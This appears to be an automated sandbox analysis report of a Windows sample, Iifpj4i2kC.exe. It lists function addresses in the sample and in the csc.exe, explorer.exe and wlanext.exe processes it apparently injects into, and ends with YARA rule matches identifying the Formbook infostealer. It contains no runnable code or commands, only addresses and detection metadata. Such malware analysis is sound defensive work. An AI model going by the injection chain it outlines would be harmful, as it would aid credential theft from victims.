Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA6A420	0_2_00007FF67FA6A420
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA60360	0_2_00007FF67FA60360
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA74390	0_2_00007FF67FA74390
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA752E0	0_2_00007FF67FA752E0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA792CE	0_2_00007FF67FA792CE
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA7D320	0_2_00007FF67FA7D320
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FB1E240	0_2_00007FF67FB1E240
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA7F280	0_2_00007FF67FA7F280
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA48220	0_2_00007FF67FA48220
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA68200	0_2_00007FF67FA68200
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA81200	0_2_00007FF67FA81200
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA65200	0_2_00007FF67FA65200
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA791B0	0_2_00007FF67FA791B0
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA66190	0_2_00007FF67FA66190
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: 0_2_00007FF67FA7B180	0_2_00007FF67FA7B180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041D8C4	5_2_0041D8C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041EB71	5_2_0041EB71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_00402D88	5_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0041DE5E	5_2_0041DE5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_00409E60	5_2_00409E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05687571	5_2_05687571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0535	5_2_055D0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566D5B0	5_2_0566D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05690591	5_2_05690591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05682446	5_2_05682446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C1460	5_2_055C1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568F43F	5_2_0568F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0567E4F6	5_2_0567E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F4750	5_2_055F4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0770	5_2_055D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CC7C0	5_2_055CC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568F7B0	5_2_0568F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056816CC	5_2_056816CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EC6E0	5_2_055EC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0569B16B	5_2_0569B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0560516C	5_2_0560516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BF172	5_2_055BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05658158	5_2_05658158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C0100	5_2_055C0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566A118	5_2_0566A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056881CC	5_2_056881CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056901AA	5_2_056901AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DB1B0	5_2_055DB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056870E9	5_2_056870E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568F0E0	5_2_0568F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D70C0	5_2_055D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0567F0CC	5_2_0567F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055BD34C	5_2_055BD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568A352	5_2_0568A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568132D	5_2_0568132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056903E6	5_2_056903E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DE3F0	5_2_055DE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0561739A	5_2_0561739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05670274	5_2_05670274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056712ED	5_2_056712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EB2C0	5_2_055EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_056502C0	5_2_056502C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D52A0	5_2_055D52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05687D73	5_2_05687D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D3D40	5_2_055D3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05681D5A	5_2_05681D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DAD00	5_2_055DAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EFDC0	5_2_055EFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CADE0	5_2_055CADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E8DBF	5_2_055E8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05649C32	5_2_05649C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0C00	5_2_055D0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568FCF2	5_2_0568FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C0CF2	5_2_055C0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05670CB5	5_2_05670CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05644F40	5_2_05644F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05612F28	5_2_05612F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568FF09	5_2_0568FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055F0F30	5_2_055F0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055C2FC8	5_2_055C2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DCFE0	5_2_055DCFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0564EFA0	5_2_0564EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D1F92	5_2_055D1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568FFB1	5_2_0568FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D0E59	5_2_055D0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568EE26	5_2_0568EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568EEDB	5_2_0568EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E2E90	5_2_055E2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D9EB0	5_2_055D9EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568CE93	5_2_0568CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D9950	5_2_055D9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EB950	5_2_055EB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055E6962	5_2_055E6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0569A9A6	5_2_0569A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D29A0	5_2_055D29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D2840	5_2_055D2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055DA840	5_2_055DA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0563D800	5_2_0563D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055FE8F0	5_2_055FE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055D38E0	5_2_055D38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055B68B8	5_2_055B68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568FB76	5_2_0568FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568AB40	5_2_0568AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05645BF0	5_2_05645BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0560DBF9	5_2_0560DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05686BD7	5_2_05686BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055EFB80	5_2_055EFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05643A6C	5_2_05643A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0568FA49	5_2_0568FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05687A46	5_2_05687A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0567DAC6	5_2_0567DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05615AA0	5_2_05615AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0566DAAC	5_2_0566DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_055CEA80	5_2_055CEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0510A036	5_2_0510A036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0510E5CD	5_2_0510E5CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05101082	5_2_05101082
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_0510B232	5_2_0510B232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05102D02	5_2_05102D02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05108912	5_2_05108912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05105B30	5_2_05105B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 5_2_05105B32	5_2_05105B32
Source: C:\Windows\explorer.exe	Code function: 6_2_0E109232	6_2_0E109232
Source: C:\Windows\explorer.exe	Code function: 6_2_0E103B30	6_2_0E103B30
Source: C:\Windows\explorer.exe	Code function: 6_2_0E103B32	6_2_0E103B32
Source: C:\Windows\explorer.exe	Code function: 6_2_0E108036	6_2_0E108036
Source: C:\Windows\explorer.exe	Code function: 6_2_0E0FF082	6_2_0E0FF082
Source: C:\Windows\explorer.exe	Code function: 6_2_0E106912	6_2_0E106912
Source: C:\Windows\explorer.exe	Code function: 6_2_0E100D02	6_2_0E100D02
Source: C:\Windows\explorer.exe	Code function: 6_2_0E10C5CD	6_2_0E10C5CD
Source: C:\Windows\explorer.exe	Code function: 6_2_0E236232	6_2_0E236232
Source: C:\Windows\explorer.exe	Code function: 6_2_0E235036	6_2_0E235036
Source: C:\Windows\explorer.exe	Code function: 6_2_0E22C082	6_2_0E22C082
Source: C:\Windows\explorer.exe	Code function: 6_2_0E230B32	6_2_0E230B32
Source: C:\Windows\explorer.exe	Code function: 6_2_0E230B30	6_2_0E230B30
Source: C:\Windows\explorer.exe	Code function: 6_2_0E22DD02	6_2_0E22DD02
Source: C:\Windows\explorer.exe	Code function: 6_2_0E233912	6_2_0E233912
Source: C:\Windows\explorer.exe	Code function: 6_2_0E2395CD	6_2_0E2395CD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037FA352	7_2_037FA352
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_038003E6	7_2_038003E6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0374E3F0	7_2_0374E3F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037E0274	7_2_037E0274
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037C02C0	7_2_037C02C0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037C8158	7_2_037C8158
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_038001AA	7_2_038001AA
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037DA118	7_2_037DA118
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03730100	7_2_03730100
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037F81CC	7_2_037F81CC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03740770	7_2_03740770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03764750	7_2_03764750
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0373C7C0	7_2_0373C7C0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0375C6E0	7_2_0375C6E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03800591	7_2_03800591
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03740535	7_2_03740535
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037F2446	7_2_037F2446
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037EE4F6	7_2_037EE4F6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037FAB40	7_2_037FAB40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037F6BD7	7_2_037F6BD7
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0373EA80	7_2_0373EA80
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03756962	7_2_03756962
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0380A9A6	7_2_0380A9A6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037429A0	7_2_037429A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0374A840	7_2_0374A840
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03742840	7_2_03742840
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0376E8F0	7_2_0376E8F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037268B8	7_2_037268B8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037B4F40	7_2_037B4F40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03760F30	7_2_03760F30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03782F28	7_2_03782F28
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0374CFE0	7_2_0374CFE0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03732FC8	7_2_03732FC8
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037BEFA0	7_2_037BEFA0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03740E59	7_2_03740E59
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037FEE26	7_2_037FEE26
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037FEEDB	7_2_037FEEDB
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03752E90	7_2_03752E90
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037FCE93	7_2_037FCE93
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0374AD00	7_2_0374AD00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0373ADE0	7_2_0373ADE0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03758DBF	7_2_03758DBF
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03740C00	7_2_03740C00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03730CF2	7_2_03730CF2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037E0CB5	7_2_037E0CB5
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0372D34C	7_2_0372D34C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037F132D	7_2_037F132D
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0378739A	7_2_0378739A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037E12ED	7_2_037E12ED
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0375B2C0	7_2_0375B2C0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037452A0	7_2_037452A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0372F172	7_2_0372F172
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0377516C	7_2_0377516C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0374B1B0	7_2_0374B1B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0380B16B	7_2_0380B16B
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037F70E9	7_2_037F70E9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037FF0E0	7_2_037FF0E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037EF0CC	7_2_037EF0CC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037470C0	7_2_037470C0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037FF7B0	7_2_037FF7B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037F16CC	7_2_037F16CC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037F7571	7_2_037F7571
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037DD5B0	7_2_037DD5B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03731460	7_2_03731460
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037FF43F	7_2_037FF43F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037FFB76	7_2_037FFB76
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037B5BF0	7_2_037B5BF0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0377DBF9	7_2_0377DBF9
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0375FB80	7_2_0375FB80
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037B3A6C	7_2_037B3A6C
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037FFA49	7_2_037FFA49
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037F7A46	7_2_037F7A46
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037EDAC6	7_2_037EDAC6
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037DDAAC	7_2_037DDAAC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03785AA0	7_2_03785AA0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03749950	7_2_03749950
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0375B950	7_2_0375B950
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037AD800	7_2_037AD800
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037438E0	7_2_037438E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037FFF09	7_2_037FFF09
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037FFFB1	7_2_037FFFB1
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03741F92	7_2_03741F92
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03749EB0	7_2_03749EB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037F7D73	7_2_037F7D73
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037F1D5A	7_2_037F1D5A
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03743D40	7_2_03743D40
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_0375FDC0	7_2_0375FDC0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037B9C32	7_2_037B9C32
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_037FFCF2	7_2_037FFCF2
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EEEB71	7_2_00EEEB71
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00ED2D88	7_2_00ED2D88
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00ED2D90	7_2_00ED2D90
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00ED9E60	7_2_00ED9E60
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00EEDE5F	7_2_00EEDE5F
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_00ED2FB0	7_2_00ED2FB0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03A5A036	7_2_03A5A036
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03A55B30	7_2_03A55B30
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03A55B32	7_2_03A55B32
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03A5B232	7_2_03A5B232
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03A58912	7_2_03A58912
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03A51082	7_2_03A51082
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03A5E5CD	7_2_03A5E5CD
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 7_2_03A52D02	7_2_03A52D02

Source: C:\Windows\SysWOW64\wlanext.exe	Code function: String function: 03787E54 appears 98 times
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: String function: 037BF290 appears 105 times
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: String function: 00FD650B appears 96 times
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: String function: 03775130 appears 36 times
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: String function: 0372B970 appears 272 times
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: String function: 037AEA12 appears 86 times
Source: C:\Users\user\Desktop\Iifpj4i2kC.exe	Code function: String function: 00007FF67FA4C1A0 appears 63 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 05605130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 05617E54 appears 96 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 0564F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 0563EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 055BB970 appears 268 times

Source: Iifpj4i2kC.exe

Static PE information: invalid certificate

Source: Iifpj4i2kC.exe	Binary or memory string: OriginalFilename vs Iifpj4i2kC.exe
Source: Iifpj4i2kC.exe, 00000000.00000002.2132087888.0000028DE9800000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCompareLessThanScalarPaddedReference.dllj% vs Iifpj4i2kC.exe
Source: Iifpj4i2kC.exe, 00000000.00000000.2109641000.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCompareLessThanScalarPaddedReference.dllj% vs Iifpj4i2kC.exe
Source: Iifpj4i2kC.exe	Binary or memory string: OriginalFilenameCompareLessThanScalarPaddedReference.dllj% vs Iifpj4i2kC.exe

Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
